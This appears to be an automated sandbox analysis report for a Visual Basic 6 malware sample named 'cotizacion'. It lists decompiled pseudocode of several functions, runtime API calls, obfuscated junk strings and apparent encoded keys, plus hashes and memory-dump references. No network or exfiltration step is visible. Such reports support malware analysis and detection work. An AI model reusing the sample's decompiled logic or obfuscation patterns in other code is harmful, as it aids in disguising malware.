__vbaFreeStr.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 004144F7
#570.MSVBVM60(0000001C,00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414517
_CIcos.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 0041452B
__vbaFpR8.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414530
__vbaEnd.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414547

Strings

incomprehensible, xrefs: 004142EF
d, xrefs: 004126AA
sykofanter, xrefs: 00413DE7
s[, xrefs: 00413A29
Subskriptionen8, xrefs: 00412DED
t, xrefs: 00414540
LAANELOFTERNE, xrefs: 00414011
samtaleemnetsrhes, xrefs: 004129FF, 00413B1F, 0041404F, 0041440D
solicit, xrefs: 004128F5
EAuxmqjme0cZFWWnSnEvZMsikYtH2nYa25, xrefs: 00413D3D
Porto7, xrefs: 004140F5
)#, xrefs: 00413219, 0041321F
bangsternears, xrefs: 00413AF3, 00413C8A
Ausones, xrefs: 00413F96
c, xrefs: 00412685
encryptions, xrefs: 00413D6B
Filmselskabets, xrefs: 00412784
Charcuterieganocephalantu, xrefs: 00413B31, 00413F21
NzXRmXMzPSdU58, xrefs: 0041295B
rebslagerierneshand, xrefs: 00412CD3, 00413A19, 00413CEB, 00413E69
M9uACtmJ7nAtSvje8kbN9w249, xrefs: 00413BE5
Gooiest4, xrefs: 00414092
Statscheferstronhi8, xrefs: 004133E8, 00413D59
Gastriloquy, xrefs: 004144B7

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$CheckHresult$Free$Error$System$Ansi$ChkstkList$CopyLate$Move$CallNew2$#600#716Addref$#516#529#532#570#581#595#596#664#676#680Icos
String ID: Ausones$Charcuterieganocephalantu$EAuxmqjme0cZFWWnSnEvZMsikYtH2nYa25$Filmselskabets$Gastriloquy$Gooiest4$LAANELOFTERNE$M9uACtmJ7nAtSvje8kbN9w249$NzXRmXMzPSdU58$Porto7$Statscheferstronhi8$Subskriptionen8$bangsternears$c$d$encryptions$incomprehensible$rebslagerierneshand$s[$samtaleemnetsrhes$solicit$sykofanter$t$)#
API String ID: 759312655-2082158243
Opcode ID: 25b4f72273c873a9ee9c5deb3feb5f1920d15748cd4bb39478705e1d8a482d06
Instruction ID: 40892eb1722d6cd4c41ba6888232a3d2f7e0e209eda52219402d84e0201dbbee
Opcode Fuzzy Hash: 25b4f72273c873a9ee9c5deb3feb5f1920d15748cd4bb39478705e1d8a482d06
Instruction Fuzzy Hash: 5F13D3B1901619EFDB20EF50CD89BDDBBB4BF08305F0041EAE548AA2A0D7795B94DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00416DF9, Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E00416DF9(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v24;
				char _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				char _v56;
				char* _v64;
				char _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr* _v84;
				signed int _v88;
				signed int _v96;
				signed long long _v100;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				signed int _v116;
				signed int _t74;
				signed int _t78;
				char* _t79;
				signed int _t85;
				signed int _t91;
				char* _t101;
				intOrPtr* _t118;
				signed long long _t129;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t118;
				_push(0x60);
				L004016F0();
				_v12 = _t118;
				_v8 = 0x4016d0;
				_v64 = 0x411afc;
				_v72 = 8;
				L004018A0();
				_t74 =  &_v56;
				_push(_t74);
				L00401816();
				L00401882();
				_push(_t74);
				_push(0);
				L0040184C();
				asm("sbb eax, eax");
				_v76 =  ~( ~_t74 + 1);
				L00401924();
				_t101 =  &_v56;
				L00401912();
				_t78 = _v76;
				if(_t78 != 0) {
					_push(_t101);
					 *_t118 =  *0x4016c8;
					_t129 =  *0x4016c0 *  *0x401618;
					if( *0x418000 != 0) {
						_push( *0x401614);
						_push( *0x401610);
						L00401714();
					} else {
						_t129 = _t129 /  *0x401610;
					}
					_v100 = _t129;
					 *_t118 = _v100;
					_v64 =  *0x4016b8;
					L0040183A();
					_v72 =  *0x4016a8;
					_v76 =  *0x4014c8;
					_v80 =  *0x4014c8;
					_t78 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t101, _t101, _t101, _t78, _t101, _t101);
					asm("fclex");
					_v76 = _t78;
					if(_v76 >= 0) {
						_v104 = _v104 & 0x00000000;
					} else {
						_push(0x2c0);
						_push(0x41017c);
						_push(_a4);
						_push(_v76);
						L00401906();
						_v104 = _t78;
					}
				}
				_push(0x411b08);
				_push(0x411b08);
				L0040184C();
				if(_t78 != 0) {
					if( *0x4183d8 != 0) {
						_v108 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4116d4);
						L004018C4();
						_v108 = 0x4183d8;
					}
					_v76 =  *_v108;
					_t85 =  *((intOrPtr*)( *_v76 + 0x4c))(_v76,  &_v36);
					asm("fclex");
					_v80 = _t85;
					if(_v80 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x4116c4);
						_push(_v76);
						_push(_v80);
						L00401906();
						_v112 = _t85;
					}
					_v84 = _v36;
					_v64 = 0x75;
					_v72 = 2;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t91 =  *((intOrPtr*)( *_v84 + 0x1c))(_v84, 0x10,  &_v40);
					asm("fclex");
					_v88 = _t91;
					if(_v88 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x411974);
						_push(_v84);
						_push(_v88);
						L00401906();
						_v116 = _t91;
					}
					_v96 = _v40;
					_v40 = _v40 & 0x00000000;
					_push(_v96);
					_push( &_v28);
					L00401888();
					L004018AC();
				}
				_v64 = L"Colmars8";
				_v72 = 8;
				L004018A0();
				_push(0);
				_t79 =  &_v56;
				_push(_t79); // executed
				L0040178C(); // executed
				L00401882();
				L00401912();
				asm("wait");
				_push(0x417099);
				L00401924();
				L004018AC();
				return _t79;
			}

0x00416dfe
0x00416e09
0x00416e0a
0x00416e11
0x00416e14
0x00416e1c
0x00416e1f
0x00416e26
0x00416e2d
0x00416e3a
0x00416e3f
0x00416e42
0x00416e43
0x00416e4d
0x00416e52
0x00416e53
0x00416e55
0x00416e5c
0x00416e61
0x00416e68
0x00416e6d
0x00416e70
0x00416e75
0x00416e7b
0x00416e87
0x00416e88
0x00416e91
0x00416e9e
0x00416ea8
0x00416eae
0x00416eb4
0x00416ea0
0x00416ea0
0x00416ea0
0x00416eb9
0x00416ec0
0x00416eca
0x00416ed3
0x00416ee0
0x00416eea
0x00416ef4
0x00416f04
0x00416f0a
0x00416f0c
0x00416f13
0x00416f2f
0x00416f15
0x00416f15
0x00416f1a
0x00416f1f
0x00416f22
0x00416f25
0x00416f2a
0x00416f2a
0x00416f13
0x00416f33
0x00416f38
0x00416f3d
0x00416f44
0x00416f51
0x00416f6b
0x00416f53
0x00416f53
0x00416f58
0x00416f5d
0x00416f62
0x00416f62
0x00416f77
0x00416f86
0x00416f89
0x00416f8b
0x00416f92
0x00416fab
0x00416f94
0x00416f94
0x00416f96
0x00416f9b
0x00416f9e
0x00416fa1
0x00416fa6
0x00416fa6
0x00416fb2
0x00416fb5
0x00416fbc
0x00416fca
0x00416fd4
0x00416fd5
0x00416fd6
0x00416fd7
0x00416fe0
0x00416fe3
0x00416fe5
0x00416fec
0x00417005
0x00416fee
0x00416fee
0x00416ff0
0x00416ff5
0x00416ff8
0x00416ffb
0x00417000
0x00417000
0x0041700c
0x0041700f
0x00417013
0x00417019
0x0041701a
0x00417022
0x00417022
0x00417027
0x0041702e
0x0041703b
0x00417040
0x00417042
0x00417045
0x00417046
0x00417050
0x00417058
0x0041705d
0x0041705e
0x0041708b
0x00417093
0x00417098

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 00416E14
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00416E3A
#667.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00416E43
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00416E4D
__vbaStrCmp.MSVBVM60(00000000,00000000,?), ref: 00416E55
__vbaFreeStr.MSVBVM60(00000000,00000000,?), ref: 00416E68
__vbaFreeVar.MSVBVM60(00000000,00000000,?), ref: 00416E70
_adj_fdiv_m64.MSVBVM60(?,00000000,00000000,?), ref: 00416EB4
__vbaFpI4.MSVBVM60(?,?,?,00000000,00000000,?), ref: 00416ED3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041017C,000002C0,?,?,?,00000000,?,?,?,00000000,00000000,?), ref: 00416F25
__vbaStrCmp.MSVBVM60(00411B08,00411B08,00000000,00000000,?), ref: 00416F3D
__vbaNew2.MSVBVM60(004116D4,004183D8,00411B08,00411B08,00000000,00000000,?), ref: 00416F5D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,0000004C,?,?,?,?,00411B08,00411B08,00000000,00000000,?), ref: 00416FA1
__vbaChkstk.MSVBVM60(?,?,?,?,?,00411B08,00411B08,00000000,00000000,?), ref: 00416FCA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411974,0000001C,?,?,?,?,00411B08,00411B08,00000000,00000000,?), ref: 00416FFB
__vbaObjSet.MSVBVM60(?,?,?,?,?,?,?,?,00411B08,00411B08,00000000,00000000,?), ref: 0041701A
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00411B08,00411B08,00000000,00000000,?), ref: 00417022
__vbaVarDup.MSVBVM60(00411B08,00411B08,00000000,00000000,?), ref: 0041703B
#645.MSVBVM60(?,00000000,00411B08,00411B08,00000000,00000000,?), ref: 00417046
__vbaStrMove.MSVBVM60(?,00000000,00411B08,00411B08,00000000,00000000,?), ref: 00417050
__vbaFreeVar.MSVBVM60(?,00000000,00411B08,00411B08,00000000,00000000,?), ref: 00417058
__vbaFreeStr.MSVBVM60(00417099,?,00000000,00411B08,00411B08,00000000,00000000,?), ref: 0041708B
__vbaFreeObj.MSVBVM60(00417099,?,00000000,00411B08,00411B08,00000000,00000000,?), ref: 00417093

Strings

tmp, xrefs: 00416E26
u, xrefs: 00416FB5
Colmars8, xrefs: 00417027

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckHresult$ChkstkMove$#645#667New2_adj_fdiv_m64
String ID: Colmars8$tmp$u
API String ID: 4120384274-4136535519
Opcode ID: f24f78f68f139ab930fa45113d4e01da3d95be05b6d16c221ffbb14d3f3156c3
Instruction ID: 0fad56f0aed83ef0405930970b4b5a527f44d6d940deb53de89a16bbc37470d0
Opcode Fuzzy Hash: f24f78f68f139ab930fa45113d4e01da3d95be05b6d16c221ffbb14d3f3156c3
Instruction Fuzzy Hash: 33712571911208EFDB00EFA1D945BEEBBB4BF04704F14882AF105BB1B1DB795A96CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00414E28, Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E00414E28(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v56;
				intOrPtr _v64;
				char _v72;
				intOrPtr _v80;
				char _v88;
				intOrPtr _v96;
				char _v104;
				intOrPtr _v112;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				char* _v160;
				intOrPtr _v168;
				char* _v268;
				short _v272;
				char* _t61;
				char* _t62;
				char* _t68;
				void* _t95;
				void* _t97;
				intOrPtr _t98;

				_t98 = _t97 - 0xc;
				 *[fs:0x0] = _t98;
				L004016F0();
				_v16 = _t98;
				_v12 = 0x401520;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4016f6, _t95);
				_push(0x54c27c);
				_push(L"bangsternears");
				_t61 =  &_v40;
				_push(_t61);
				L004018D6();
				_push(_t61);
				_push(L"hjlrd");
				_t62 =  &_v36;
				_push(_t62);
				L004018D6();
				_push(_t62);
				_push(0x4c69df);
				_push(0x98e72e79);
				_push(0x8904d3f8); // executed
				E00411290(); // executed
				_v268 = _t62;
				L004018D0();
				_v272 =  ~(0 | _v268 == 0x8904d3f8);
				_push( &_v40);
				_push( &_v36);
				_push(2);
				L004018CA();
				_t68 = _v272;
				if(_t68 != 0) {
					_push(0);
					_push(L"Indpiskedes");
					_push( &_v56);
					L00401918();
					_t68 = 0x10;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v32);
					L0040191E();
					L00401912();
				}
				_push(0x79b3bd);
				E00411508();
				_v268 = _t68;
				L004018D0();
				if(_v268 == 0x750289) {
					_v144 = 0x80020004;
					_v152 = 0xa;
					_v128 = 0x80020004;
					_v136 = 0xa;
					_v112 = 0x80020004;
					_v120 = 0xa;
					_v96 = 0x80020004;
					_v104 = 0xa;
					_v80 = 0x80020004;
					_v88 = 0xa;
					_v64 = 0x80020004;
					_v72 = 0xa;
					_v160 = L"NOSTER";
					_v168 = 8;
					L004018A0();
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_push( &_v56);
					L0040187C();
					L00401882();
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_t68 =  &_v56;
					_push(_t68);
					_push(7);
					L00401942();
				}
				_push(0x41506c);
				L00401924();
				L004018AC();
				return _t68;
			}

0x00414e2b
0x00414e3a
0x00414e46
0x00414e4e
0x00414e51
0x00414e58
0x00414e67
0x00414e6a
0x00414e6f
0x00414e74
0x00414e77
0x00414e78
0x00414e7d
0x00414e7e
0x00414e83
0x00414e86
0x00414e87
0x00414e8c
0x00414e8d
0x00414e92
0x00414e97
0x00414e9c
0x00414ea1
0x00414ea7
0x00414ebd
0x00414ec7
0x00414ecb
0x00414ecc
0x00414ece
0x00414ed6
0x00414edf
0x00414ee1
0x00414ee3
0x00414eeb
0x00414eec
0x00414ef3
0x00414ef4
0x00414efe
0x00414eff
0x00414f00
0x00414f01
0x00414f02
0x00414f04
0x00414f07
0x00414f0f
0x00414f0f
0x00414f14
0x00414f19
0x00414f1e
0x00414f24
0x00414f33
0x00414f39
0x00414f43
0x00414f4d
0x00414f54
0x00414f5e
0x00414f65
0x00414f6c
0x00414f73
0x00414f7a
0x00414f81
0x00414f88
0x00414f8f
0x00414f96
0x00414fa0
0x00414fb3
0x00414fbe
0x00414fc5
0x00414fc9
0x00414fcd
0x00414fd1
0x00414fd5
0x00414fd9
0x00414fda
0x00414fe4
0x00414fef
0x00414ff6
0x00414ffa
0x00414ffe
0x00415002
0x00415006
0x00415007
0x0041500a
0x0041500b
0x0041500d
0x00415012
0x00415015
0x0041505e
0x00415066
0x0041506b

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 00414E46
__vbaStrToAnsi.MSVBVM60(0054C27C,bangsternears,0054C27C,?,?,?,?,004016F6), ref: 00414E78
__vbaStrToAnsi.MSVBVM60(?,hjlrd,00000000,0054C27C,bangsternears,0054C27C,?,?,?,?,004016F6), ref: 00414E87
__vbaSetSystemError.MSVBVM60(8904D3F8,98E72E79,004C69DF,00000000,?,hjlrd,00000000,0054C27C,bangsternears,0054C27C,?,?,?,?,004016F6), ref: 00414EA7
__vbaFreeStrList.MSVBVM60(00000002,?,0054C27C), ref: 00414ECE
#716.MSVBVM60(?,Indpiskedes,00000000,?,?,004016F6), ref: 00414EEC
__vbaChkstk.MSVBVM60(?,Indpiskedes,00000000,?,?,004016F6), ref: 00414EF4
__vbaLateIdSt.MSVBVM60(00000000,00000000,?,Indpiskedes,00000000,?,?,004016F6), ref: 00414F07
__vbaFreeVar.MSVBVM60(00000000,00000000,?,Indpiskedes,00000000,?,?,004016F6), ref: 00414F0F
__vbaSetSystemError.MSVBVM60(0079B3BD,?,?,004016F6), ref: 00414F24
__vbaVarDup.MSVBVM60 ref: 00414FB3
#596.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 00414FDA
__vbaStrMove.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 00414FE4
__vbaFreeVarList.MSVBVM60(00000007,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0041500D
__vbaFreeStr.MSVBVM60(0041506C), ref: 0041505E
__vbaFreeObj.MSVBVM60(0041506C), ref: 00415066

Strings

hjlrd, xrefs: 00414E7E
bangsternears, xrefs: 00414E6F
Indpiskedes, xrefs: 00414EE3
NOSTER, xrefs: 00414F96

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$Free$AnsiChkstkErrorListSystem$#596#716LateMove
String ID: Indpiskedes$NOSTER$bangsternears$hjlrd
API String ID: 2424355990-1043710842
Opcode ID: e09338767c3f7618615795daf5aa30eb77b64da12217dca8f0acb84fff08ae51
Instruction ID: 2a460c96eda62e93f450cab9ea1596f23017c3b92b10bda1df40dae509e4e8fb
Opcode Fuzzy Hash: e09338767c3f7618615795daf5aa30eb77b64da12217dca8f0acb84fff08ae51
Instruction Fuzzy Hash: 97510BB2D0020CAADB11EFA1C945BDEB7B8EF04704F20806AF205B7191DBB99B858F55

Uniqueness

Uniqueness Score: -1.00%

Function 00414C28, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E00414C28(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long _v28;
				char _v44;
				char _v60;
				char* _v84;
				intOrPtr _v92;
				intOrPtr _v100;
				char _v108;
				short _v112;
				short _t23;
				short _t26;
				intOrPtr _t35;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t35;
				_push(0x60);
				L004016F0();
				_v12 = _t35;
				_v8 = 0x4014f8;
				_v84 = L"12-12-12";
				_v92 = 8;
				L004018A0();
				_push(1);
				_push(1);
				_push( &_v44);
				_push(0x411884);
				_push( &_v60); // executed
				L00401822(); // executed
				_v100 = 0xc;
				_v108 = 0x8002;
				_push( &_v60);
				_t23 =  &_v108;
				_push(_t23);
				L00401828();
				_v112 = _t23;
				_push( &_v60);
				_push( &_v44);
				_push(2);
				L00401942();
				_t26 = _v112;
				if(_t26 != 0) {
					_push(L"ankergangs");
					L00401894();
				}
				_v28 =  *0x4014f0;
				asm("wait");
				_push(0x414cf0);
				return _t26;
			}

0x00414c2d
0x00414c38
0x00414c39
0x00414c40
0x00414c43
0x00414c4b
0x00414c4e
0x00414c55
0x00414c5c
0x00414c69
0x00414c6e
0x00414c70
0x00414c75
0x00414c76
0x00414c7e
0x00414c7f
0x00414c84
0x00414c8b
0x00414c95
0x00414c96
0x00414c99
0x00414c9a
0x00414c9f
0x00414ca6
0x00414caa
0x00414cab
0x00414cad
0x00414cb5
0x00414cbb
0x00414cbd
0x00414cc2
0x00414cc2
0x00414ccd
0x00414cd0
0x00414cd1
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 00414C43
__vbaVarDup.MSVBVM60 ref: 00414C69
#663.MSVBVM60(?,00411884,?,00000001,00000001), ref: 00414C7F
__vbaVarTstNe.MSVBVM60(00008002,?,?,00411884,?,00000001,00000001), ref: 00414C9A
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,00411884,?,00000001,00000001), ref: 00414CAD
#532.MSVBVM60(ankergangs), ref: 00414CC2

Strings

12-12-12, xrefs: 00414C55
ankergangs, xrefs: 00414CBD

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$#532#663ChkstkFreeList
String ID: 12-12-12$ankergangs
API String ID: 2176192853-2523394133
Opcode ID: 3d5b235c3475dbf41fcfb6f27479f7e04a6a56ac000f08d8d331ce8d10e9d58f
Instruction ID: 4022386796d0570533e7d57a3d0c2e6358602262ad0d8f379e8f526718e2a2f2
Opcode Fuzzy Hash: 3d5b235c3475dbf41fcfb6f27479f7e04a6a56ac000f08d8d331ce8d10e9d58f
Instruction Fuzzy Hash: 57110DB194024DAAEB00EBD1D846FDEBB7CFB44B44F50452BF100BA1A1E7B85584CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004154FD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E004154FD(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				char _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr* _v48;
				signed int _v52;
				signed int _t24;
				char* _t27;
				intOrPtr _t37;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t37;
				_t24 = 0x20;
				L004016F0();
				_v12 = _t37;
				_v8 = 0x401560;
				_push(0x3090b5);
				_push(0x8904d3f8);
				_push(0x8904d3f8); // executed
				E00411478(); // executed
				_v32 = _t24;
				L004018D0();
				if(_v32 == 0x2ab3a6) {
					if( *0x4183d8 != 0) {
						_v48 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4116d4);
						L004018C4();
						_v48 = 0x4183d8;
					}
					_v36 =  *_v48;
					_t27 =  &_v28;
					L004018BE();
					_t24 =  *((intOrPtr*)( *_v36 + 0x10))(_v36, _t27, _t27, _a4);
					asm("fclex");
					_v40 = _t24;
					if(_v40 >= 0) {
						_v52 = _v52 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x4116c4);
						_push(_v36);
						_push(_v40);
						L00401906();
						_v52 = _t24;
					}
					L004018AC();
				}
				_v24 = 0x3e59;
				_push(0x4155dc);
				return _t24;
			}

0x00415502
0x0041550d
0x0041550e
0x00415517
0x00415518
0x00415520
0x00415523
0x0041552a
0x0041552f
0x00415534
0x00415539
0x0041553e
0x00415541
0x0041554d
0x00415556
0x00415570
0x00415558
0x00415558
0x0041555d
0x00415562
0x00415567
0x00415567
0x0041557c
0x00415582
0x00415586
0x00415594
0x00415597
0x00415599
0x004155a0
0x004155b9
0x004155a2
0x004155a2
0x004155a4
0x004155a9
0x004155ac
0x004155af
0x004155b4
0x004155b4
0x004155c0
0x004155c0
0x004155c5
0x004155cb
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 00415518
__vbaSetSystemError.MSVBVM60(8904D3F8,8904D3F8,003090B5,?,?,?,?,004016F6), ref: 00415541
__vbaNew2.MSVBVM60(004116D4,004183D8,8904D3F8,8904D3F8,003090B5,?,?,?,?,004016F6), ref: 00415562
__vbaObjSetAddref.MSVBVM60(?,?,8904D3F8,8904D3F8,003090B5,?,?,?,?,004016F6), ref: 00415586
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,00000010,?,?,?,?,?,?,004016F6), ref: 004155AF
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,004016F6), ref: 004155C0

Strings

Y>, xrefs: 004155C5

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: __vba$AddrefCheckChkstkErrorFreeHresultNew2System
String ID: Y>
API String ID: 3092135765-3955353929
Opcode ID: d960a3474fdcd6ecde1ea63b9ff5303eca39ff723290ff1c9458d4113c05637d
Instruction ID: 6adc6a1e1e75e8767f261d3d7738823c1c52393b408391d8ec31a9275a3325cf
Opcode Fuzzy Hash: d960a3474fdcd6ecde1ea63b9ff5303eca39ff723290ff1c9458d4113c05637d
Instruction Fuzzy Hash: F3213971D10708EFCF00AB95C805BDEBBB6EB08748F50446AF500B61A1D7B969809F6D

Uniqueness

Uniqueness Score: -1.00%

Function 00401968, Relevance: 4.5, APIs: 1, Strings: 1, Instructions: 1040
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#100.MSVBVM60(VB5!6&*), ref: 0040196D

Strings

VB5!6&*, xrefs: 00401968

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 9e82b694c25db16ca50c489c78efcc66d361ccdec27cfbf5142b66c6653a307d
Instruction ID: f329466108540c0179700c88d573e4e4c7baf1a0b1a8117c2c2658920e1d1665
Opcode Fuzzy Hash: 9e82b694c25db16ca50c489c78efcc66d361ccdec27cfbf5142b66c6653a307d
Instruction Fuzzy Hash: 84A2327518E3C28FC7434BB49DA00953FB1AE5726436E45EBC881CE4B3E2AD1C4AC762

Uniqueness

Uniqueness Score: -1.00%

Function 00411250, Relevance: .0, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.493150752.0000000000418000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cotizacion.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43c90b98cd41f10055e32756e221bbaaf59c8c4586a4a00913679d6511d93b4f
Instruction ID: 10546303ed7a9ae0cf3f0ee68ea8c4eefbe67d1c9d9aee66edf5b47f80932b22
Opcode Fuzzy Hash: 43c90b98cd41f10055e32756e221bbaaf59c8c4586a4a00913679d6511d93b4f
Instruction Fuzzy Hash: C6B012303D40019A530043D44C414F412D0A3447C0368CE73FD11F61B0CA78CD45862E

Uniqueness

Uniqueness Score: -1.00%

Function 00411478, Relevance: .0, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.493117102.0000000000400000.00000002.00020000.sdmp Download File
